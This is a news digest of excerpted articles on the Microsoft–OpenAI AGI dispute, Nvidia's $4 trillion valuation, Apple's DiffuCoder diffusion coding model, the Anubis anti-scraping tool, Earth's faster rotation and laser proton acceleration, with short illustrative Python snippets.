[...] The Microsoft-OpenAI dispute illustrates what happens when philosophical speculation is turned into legal obligations. When the companies signed their partnership agreement, they included a clause stating that when OpenAI achieves AGI, it can limit Microsoft's access to future technology. According to The Wall Street Journal, OpenAI executives believe they're close to declaring AGI, while Microsoft CEO Satya Nadella, speaking on the Dwarkesh Patel podcast in February, called the idea of using AGI as a self-proclaimed milestone "nonsensical benchmark hacking."
[...] The disconnect we've seen above between researcher consensus, firm terminology definitions, and corporate rhetoric has a real impact. When policymakers act as if AGI is imminent based on hype rather than scientific evidence, they risk making decisions that don't match reality. When companies write contracts around undefined terms, they may create legal time bombs.
The definitional chaos around AGI isn't just philosophical hand-wringing. Companies use promises of impending AGI to attract investment, talent, and customers. Governments craft policy based on AGI timelines. The public forms potentially unrealistic expectations about AI's impact on jobs and society based on these fuzzy concepts.
Without clear definitions, we can't have meaningful conversations about AI misapplications, regulation, or development priorities. We end up talking past each other, with optimists and pessimists using the same words to mean fundamentally different things.
For the first time ever, a company has achieved a market capitalization of $4 trillion. And that company is none other than Nvidia:
The chipmaker's shares rose as much as 2.5% on Wednesday, pushing past the previous market value record ($3.9 trillion), set by Apple in December 2024. Shares in the AI giant later closed at $162.88, shrinking the company's market value to $3.97 trillion.
Nvidia has rallied by more than 70% from its April 4 low, when global stock markets were sent reeling by President Donald Trump's global tariff rollout.
[...] The record value comes as tech giants such as OpenAI, Amazon and Microsoft are spending hundreds of billions of dollars in the race to build massive data centers to fuel the artificial intelligence revolution. All of those companies are using Nvidia chips to power their services, though some are also developing their own.
In the first quarter of 2025 alone, the company reported its revenue soared about 70%, to more than $44 billion. Nvidia said it expects another $45 billion worth of sales in the current quarter.
Also at: ZeroHedge, CNN and AP.
Related: Nvidia Reportedly Raises GPU Prices by 10-15% as Tariffs and TSMC Price Hikes Filter Down
Apple just released an interesting coding language model - 9to5Mac:
Apple quietly dropped a new AI model on Hugging Face with an interesting twist. Instead of writing code like traditional LLMs generate text (left to right, top to bottom), it can also write out of order, and improve multiple chunks at once.
The result is faster code generation, at a performance that rivals top open-source coding models. Here's how it works.
The nerdy bits
Here are some (overly simplified, in the name of efficiency) concepts that are important to understand before we can move on.
Autoregression
Traditionally, most LLMs have been autoregressive. This means that when you ask them something, they process your entire question, predict the first token of the answer, reprocess the entire question with the first token, predict the second token, and so on. This makes them generate text like most of us read: left to right, top to bottom.
Temperature
LLMs have a setting called temperature that controls how random the output can be. When predicting the next token, the model assigns probabilities to all possible options. A lower temperature makes it more likely to choose the most probable token, while a higher temperature gives it more freedom to pick less likely ones.
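As a minimal sketch of that idea (not any particular model's code), the Python below scales a toy set of next-token scores by a temperature before sampling: a low temperature almost always picks the top token, while a high temperature lets the long shots through.

```python
import math
import random

def sample_next_token(logits, temperature=1.0):
    """Pick the next token from raw scores, scaled by temperature.

    Lower temperature sharpens the distribution (the top token wins almost
    every time); higher temperature flattens it, letting less likely tokens
    through. Generic illustration only.
    """
    scaled = {tok: score / temperature for tok, score in logits.items()}
    max_s = max(scaled.values())                              # numerical stability
    exps = {tok: math.exp(s - max_s) for tok, s in scaled.items()}
    total = sum(exps.values())
    probs = {tok: e / total for tok, e in exps.items()}
    return random.choices(list(probs), weights=list(probs.values()))[0]

# Toy scores for the next token after "The cat sat on the"
logits = {"mat": 4.0, "sofa": 2.5, "moon": 0.5}
print(sample_next_token(logits, temperature=0.2))  # almost always "mat"
print(sample_next_token(logits, temperature=1.2))  # "sofa" and "moon" show up more often
```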
Diffusion
An alternative to autoregressive models is diffusion models, which have been more often used by image models like Stable Diffusion. In a nutshell, the model starts with a fuzzy, noisy image, and it iteratively removes the noise while keeping the user request in mind, steering it towards something that looks more and more like what the user requested.
Still with us? Great!
Lately, some large language models have looked to the diffusion architecture to generate text, and the results have been pretty promising. If you want to dive deeper into how it works, here's a great explainer:
Why am I telling you all this? Because now you can see why diffusion-based text models can be faster than autoregressive ones, since they can basically (again, basically) iteratively refine the entire text in parallel.
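Here's a toy sketch of that parallel-refinement idea, under the simplifying assumption that a stand-in "model" already knows the answer: start from a fully masked sequence and, on each pass, commit the positions the model is most confident about, touching the whole sequence at once rather than one token at a time. A real masked-diffusion model, like the one described in the DiffuCoder paper, would predict tokens and confidences from the surrounding context instead.

```python
import random

# Toy illustration of masked-diffusion text generation. The "denoiser" below is
# a stand-in that already knows the target; it exists only to show the loop.
TARGET = ["def", "add", "(", "a", ",", "b", ")", ":", "return", "a", "+", "b"]
MASK = "<mask>"

def fake_denoiser(seq):
    """Propose (position, token, confidence) for every still-masked slot."""
    return [(i, TARGET[i], random.random()) for i, tok in enumerate(seq) if tok == MASK]

seq = [MASK] * len(TARGET)
step = 0
while MASK in seq:
    proposals = sorted(fake_denoiser(seq), key=lambda p: p[2], reverse=True)
    for pos, token, _conf in proposals[: max(1, len(proposals) // 2)]:
        seq[pos] = token              # commit the most confident half this pass
    step += 1
    print(f"pass {step}: {' '.join(seq)}")
```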
This behavior is especially useful for programming, where global structure matters more than linear token prediction.
Phew! We made it. So Apple released a model?
Yes. They released an open-source model called DiffuCoder-7B-cpGRPO, which builds on top of a paper called DiffuCoder: Understanding and Improving Masked Diffusion Models for Code Generation, released just last month.
The paper describes a model that takes a diffusion-first approach to code generation, but with a twist:
"When the sampling temperature is increased from the default 0.2 to 1.2, DiffuCoder becomes more flexible in its token generation order, freeing itself from strict left-to-right constraints"
This means that by adjusting the temperature, it can behave either more or less like an autoregressive model. In essence, higher temperatures give it more flexibility to generate tokens out of order, while lower temperatures keep it closer to strict left-to-right decoding.
And with an extra training step called coupled-GRPO, it learned to generate higher-quality code with fewer passes. The result? Code that's faster to generate, globally coherent, and competitive with some of the best open-source programming models out there.
Built on top of an open-source LLM by Alibaba
Even more interestingly, Apple's model is built on top of Qwen2.5‑7B, an open-source foundation model from Alibaba. Alibaba first fine-tuned that model for better code generation (as Qwen2.5‑Coder‑7B), then Apple took it and made its own adjustments.
They turned it into a new model with a diffusion-based decoder, as described in the DiffuCoder paper, and then adjusted it again to better follow instructions. Once that was done, they trained yet another version of it using more than 20,000 carefully picked coding examples.
And all this work paid off. DiffuCoder-7B-cpGRPO got a 4.4% boost on a popular coding benchmark, and it maintained its lower dependency on generating code strictly from left to right.
Of course, there is plenty of room for improvement. Although DiffuCoder did better than many diffusion-based coding models (and that was before the 4.4% bump from DiffuCoder-7B-cpGRPO), it still doesn't quite reach the level of GPT-4 or Gemini Diffusion.
And while some have pointed out that 7 billion parameters might be limiting, or that its diffusion-based generation still resembles a sequential process, the bigger point is this: little by little, Apple has been laying the groundwork for its generative AI efforts with some pretty interesting and novel ideas.
Whether (or perhaps when?) that will actually translate into real features and products for users and developers is another story.
Of course, Bill Gates says AI will replace humans for most things — but coding will remain "a 100% human profession" centuries later. So what's your take? Are programmers on the way out or safe?
AI Is Scraping the Web, but the Web Is Fighting Back:
AI is not magic. The tools that generate essays or hyper-realistic videos from simple user prompts can only do so because they have been trained on massive data sets. That data, of course, needs to come from somewhere, and that somewhere is often the stuff on the internet that's been made and written by people.
The internet happens to be quite a large source of data and information. As of last year, the web contained 149 zettabytes of data. That's 149 million petabytes, or 149 billion terabytes, or 149 trillion gigabytes, otherwise known as a lot. Such a collection of textual, image, visual, and audio-based data is irresistible to AI companies that need more data than ever to keep growing and improving their models.
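For the unit-minded, a quick sanity check of those conversions (using decimal prefixes):

```python
ZETTABYTE = 10**21                 # bytes, decimal prefix
total_bytes = 149 * ZETTABYTE
print(total_bytes / 10**15)        # petabytes: 1.49e8  -> 149 million
print(total_bytes / 10**12)        # terabytes: 1.49e11 -> 149 billion
print(total_bytes / 10**9)         # gigabytes: 1.49e14 -> 149 trillion
```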
So, AI bots scrape the worldwide web, hoovering up any and all data they can to better their neural networks. Some companies, seeing the business potential, inked deals to sell their data to AI companies, including companies like Reddit, the Associated Press, and Vox Media. AI companies don't necessarily ask permission before scraping data across the internet, and, as such, many companies have taken the opposite approach, launching lawsuits against companies like OpenAI, Google, and Anthropic. (Disclosure: Lifehacker's parent company, Ziff Davis, filed a lawsuit against OpenAI in April, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.)
Those lawsuits probably aren't slowing down the AI vacuum machines. In fact, the machines are in desperate need of more data: Last year, researchers found that AI models were running out of data necessary to continue with the current rate of growth. Some projections saw the runway giving out sometime in 2028, which, if true, gives only a few years left for AI companies to scrape the web for data. While they'll look to other data sources, like official deals or synthetic data (data produced by AI), they need the internet more than ever.
If you have any presence on the internet whatsoever, there's a good chance your data was sucked up by these AI bots. It's scummy, but it's also what powers the chatbots so many of us have started using over the past two and a half years.
But just because the situation is a bit dire for the internet at large, that doesn't mean it's giving up entirely. On the contrary, there is real opposition to this type of practice, especially when it goes after the little guy.
In true David-and-Goliath fashion, one web developer has taken it upon themselves to build a tool for web developers to block AI bots from scraping their sites for training data. The tool, Anubis, launched at the beginning of this year, and has been downloaded over 200,000 times.
Anubis is the creation of Xe Iaso, a developer based in Ottawa, Canada. As reported by 404 Media, Iaso started Anubis after she discovered an Amazon bot clicking on every link on her Git server. After deciding against taking the Git server down entirely, she experimented with a few different tactics before discovering a way to block these bots: an "uncaptcha," as Iaso calls it.
Here's how it works: When running Anubis on your site, the program checks that a new visitor is actually a human by having the browser run cryptographic math with JavaScript. According to 404 Media, most browsers since 2022 can pass this test, as these browsers have tools built-in to run this type of JavaScript. Bots, on the other hand, usually need to be coded to run this cryptographic math, which would be too taxing to implement on all bot scrapes en masse. As such, Iaso has figured out a clever way to verify browsers via a test these browsers pass in their digital sleep, while blocking out bots whose developers can't afford the processing power required to pass the test.
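For a sense of how that asymmetry works, here is a hashcash-style proof-of-work analogue in Python. Anubis's real challenge is cryptographic math run by the browser's JavaScript, as described above; the hashing scheme, difficulty, and challenge format below are illustrative assumptions, not Anubis's actual code. The point is that one interactive visitor barely notices the cost, a scraper hitting millions of pages pays it millions of times, and the server verifies each answer with a single hash.

```python
import hashlib
import secrets

DIFFICULTY_BITS = 16  # placeholder difficulty: ~65,000 hashes on average to solve

def solve(challenge):
    """The 'browser' burns CPU until SHA-256(challenge + nonce) has enough leading zeros."""
    prefix = "0" * (DIFFICULTY_BITS // 4)   # leading zero hex digits
    nonce = 0
    while True:
        digest = hashlib.sha256(f"{challenge}{nonce}".encode()).hexdigest()
        if digest.startswith(prefix):
            return nonce
        nonce += 1

def verify(challenge, nonce):
    """The server checks the answer with one cheap hash."""
    prefix = "0" * (DIFFICULTY_BITS // 4)
    return hashlib.sha256(f"{challenge}{nonce}".encode()).hexdigest().startswith(prefix)

challenge = secrets.token_hex(8)   # server issues a random challenge per visit
nonce = solve(challenge)           # costly for the visitor, ruinous at scraper scale
print(verify(challenge, nonce))    # True, verified in microseconds
```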
This isn't something the average web surfer needs to think about; Anubis is made for people who run their own websites and servers. To that end, the tool is completely free and open source, and it's still under active development. Iaso tells 404 Media that while she doesn't have the resources to work on Anubis full time, she plans to add new features, including a test that's easier on the end user's CPU and one that doesn't rely on JavaScript, since some users disable JavaScript as a privacy measure.
If you're interested in running Anubis on your own server, you can find detailed instructions for doing so on Iaso's GitHub page. You can also test your own browser to make sure you aren't a bot.
Iaso isn't the only one on the web fighting back against AI crawlers. Cloudflare, for example, is blocking AI crawlers by default as of this month, and will also let customers charge AI companies that want to harvest the data on their sites. Perhaps as it becomes easier to stop AI companies from openly scraping the web, these companies will scale back their efforts—or, at the very least, offer site owners more in return for their data.
My hope is that I run into more websites that initially load with the Anubis splash screen. If I click a link, and am presented with the "Making sure you're not a bot" message, I'll know that site has successfully blocked these AI crawlers. For a while there, the AI machine felt unstoppable. Now, it feels like there's something we can do to at least put it in check.
See Also:
Earth is going to spin much faster over the next few months:
Earth is expected to spin more quickly in the coming weeks, making some of our days unusually short. On July 9, July 22 and Aug. 5, the position of the moon is expected to affect Earth's rotation so that each day is between 1.3 and 1.51 milliseconds shorter than normal.
A day on Earth is the length of time needed for our planet to fully rotate on its axis — approximately 86,400 seconds, or 24 hours. But Earth's rotation is affected by a number of things, including the positions of the sun and moon, changes to Earth's magnetic field, and the balance of mass on the planet.
Since the relatively early days of our planet, Earth's rotation has been slowing down, making our days longer. Researchers found that about 1 billion to 2 billion years ago, a day on Earth was only 19 hours long. This is likely because the moon was closer to our planet, making its gravitational pull stronger than it is now and causing Earth to spin faster on its axis.
Since then, as the moon has moved away from us, days on average have been getting longer. But in recent years, scientists have reported variations in Earth's rotation. In 2020, scientists found that Earth was spinning more quickly than at any point since records began in the 1970s, and we saw the shortest-ever recorded day on July 5, 2024, which was 1.66 milliseconds shy of 24 hours, according to timeanddate.com.
On July 9, July 22 and Aug. 5, 2025, the moon will be at its furthest distance from Earth's equator, which changes the impact its gravitational pull has on our planet's axis. Think of the Earth as a spinning top — if you were to put your fingers around the middle and spin, it wouldn't rotate as quickly as if you were to hold it from the top and bottom.
With the moon closer to the poles, the Earth's spin speeds up, making our day shorter than usual.
These variations are to be expected, but recent research suggests that human activity is also contributing to the change in the planet's rotation. Researchers at NASA have calculated that the movement of ice and groundwater, linked to climate change, has increased the length of our days by 1.33 milliseconds per century between 2000 and 2018.
Single events can also affect Earth's spin: the 2011 earthquake that struck Japan shortened the length of the day by 1.8 microseconds. Even the changing seasons affect Earth's spin, Richard Holme, a geophysicist at the University of Liverpool, told Live Science via email.
"There is more land in the northern hemisphere than the south," Holme said. "In northern summer, the trees get leaves, this means that mass is moved from the ground to above the ground — further away from the Earth's spin axis." The rate of rotation of any moving body is affected by its distribution of mass. When an ice skater spins on the spot, they rotate faster when their arms are tight to their chest, and slow themselves down by stretching their arms out. As Earth's mass moves away from its core in summer, its rate of rotation must decrease, so the length of the day increases, Holme explained.
Of course, on the days in question our clocks will still count 24 hours. The difference isn't noticeable on the individual level.
The only time we would see a change to time zones is if the difference between the length of day is greater than 0.9 seconds, or 900 milliseconds. Though this has never happened in a single day, over the years our clocks fall out of sync with the position of the planet. This is monitored by the International Earth Rotation and Reference Systems Service (IERS), which will add a "leap second" to UTC as needed to bring us back in line.
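For a sense of scale, here's a short sketch of the drift arithmetic. The 1.4 ms/day figure is just an illustrative value in the range quoted above, not a forecast of actual rotation behavior.

```python
# How long would a constant per-day offset take to accumulate the 0.9 s
# of drift that prompts the IERS to adjust UTC with a leap second?
THRESHOLD_S = 0.9

def days_to_threshold(offset_ms_per_day: float) -> float:
    """Days of a steady offset needed to build up 0.9 s of clock drift."""
    return THRESHOLD_S / (offset_ms_per_day / 1_000)

print(f"{days_to_threshold(1.4):.0f} days")  # roughly 640 days at 1.4 ms/day
```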
Compact GeV Proton Acceleration Using Ultra-Intense Lasers:
According to a study published in Scientific Reports, researchers at the University of Osaka have proposed "micronozzle acceleration"—a unique approach for creating giga-electron-volt proton beams using ultra-intense lasers.
Proton beams with giga-electron-volt (GeV) energy, previously considered possible only with giant particle accelerators, may soon be created in small setups, owing to a discovery by researchers at the University of Osaka.
Professor Masakatsu Murakami's team devised a novel concept known as micronozzle acceleration (MNA). Using extensive numerical simulations, the researchers achieved a world first: modeling a microtarget with tiny nozzle-like features and irradiating it with ultra-intense, ultra-short laser pulses.
Unlike traditional laser-based acceleration methods, which use flat targets and have energy limits below 100 mega-electron-volts (1 GeV = 1000 MeV), the micronozzle structure allows for sustained, stepwise acceleration of protons within a powerful quasi-static electric field created inside the target. This innovative method permits proton energy to approach 1 GeV while maintaining great beam quality and stability.
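For a sense of what those energies mean, here's a small, purely illustrative Python calculation of how fast protons travel at these kinetic energies, using the standard relativistic relation between kinetic energy and speed (textbook physics, not figures from the paper):

```python
# Illustrative only: what does 1 GeV of kinetic energy mean for a proton?
# gamma = 1 + T / (m c^2), beta = sqrt(1 - 1/gamma^2)
PROTON_REST_ENERGY_MEV = 938.272

def proton_speed_fraction(kinetic_energy_mev: float) -> float:
    """Return the proton's speed as a fraction of c for a given kinetic energy."""
    gamma = 1 + kinetic_energy_mev / PROTON_REST_ENERGY_MEV
    return (1 - 1 / gamma**2) ** 0.5

print(f"100 MeV proton: {proton_speed_fraction(100):.2f} c")   # ~0.43 c
print(f"  1 GeV proton: {proton_speed_fraction(1000):.2f} c")  # ~0.87 c
```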
This discovery opens a new door for compact, high-efficiency particle acceleration. We believe this method has the potential to revolutionize fields such as laser fusion energy, advanced radiotherapy, and even laboratory-scale astrophysics.
Masakatsu Murakami, Professor, The University of Osaka
The implications are extensive:
- Energy: Supports laser-driven nuclear fusion with fast-ignition techniques
- Medicine: Makes proton cancer treatment systems more accurate and compact
- Fundamental science: Enables the simulation of extreme astrophysical environments and the study of matter under ultra-strong magnetic fields
The study is the first theoretical proof of compact GeV proton acceleration utilizing microstructured targets. It is based on simulations conducted on the University of Osaka's SQUID supercomputer.
Journal Reference:
Murakami, M., Balusu, D., Maruyama, S., et al. Generation of giga-electron-volt proton beams by micronozzle acceleration [open], Scientific Reports (DOI: 10.1038/s41598-025-03385-x)
See also: